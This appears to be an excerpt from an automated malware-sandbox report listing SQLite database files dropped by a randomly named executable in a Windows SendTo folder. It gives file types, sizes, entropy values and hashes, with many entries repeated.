                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
